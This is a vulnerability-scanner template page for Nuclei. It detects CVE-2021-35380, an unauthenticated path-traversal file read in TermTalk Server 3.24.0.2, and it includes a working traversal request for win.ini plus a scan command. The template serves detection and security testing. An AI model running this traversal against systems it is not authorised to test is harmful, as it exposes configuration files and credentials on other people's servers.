Skip to content
Nuclei Templates

TermTalk Server 3.24.0.2 - Local File Inclusion

ID: CVE-2021-35380

Severity: high

Author: fxploit

Tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari

Description

Section titled “Description”

TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.

YAML Source

Section titled “YAML Source”
id: CVE-2021-35380


info:
  name: TermTalk Server 3.24.0.2 - Local File Inclusion
  author: fxploit
  severity: high
  description: |
    TermTalk Server (TTServer) 3.24.0.2 is vulnerable to file inclusion which allows unauthenticated malicious user to gain access to the files on the remote system by providing the relative path of the file they want to retrieve.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
  remediation: |
    Apply the latest patch or upgrade to a non-vulnerable version of TermTalk Server.
  reference:
    - https://www.swascan.com/solari-di-udine/
    - https://www.exploit-db.com/exploits/50638
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35380
    - https://www.swascan.com/it/security-blog/
    - https://github.com/anonymous364872/Rapier_Tool
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-35380
    cwe-id: CWE-22
    epss-score: 0.45222
    epss-percentile: 0.97404
    cpe: cpe:2.3:a:solari:termtalk_server:3.24.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: solari
    product: termtalk_server
  tags: cve2021,cve,termtalk,lfi,unauth,lfr,edb,solari


http:
  - method: GET
    path:
      - "{{BaseURL}}/file?valore=../../../../../windows/win.ini"


    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 490a004630440220354173f6e86de83e5715cb10d1543ca0e0dd0d9d32d26e5038f63dcc77f583d002205ed789125ba800e9d3e07ada0a395e912bbc26fdc400fc7a6145f346dc7c4f6f:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-35380.yaml"

View on Github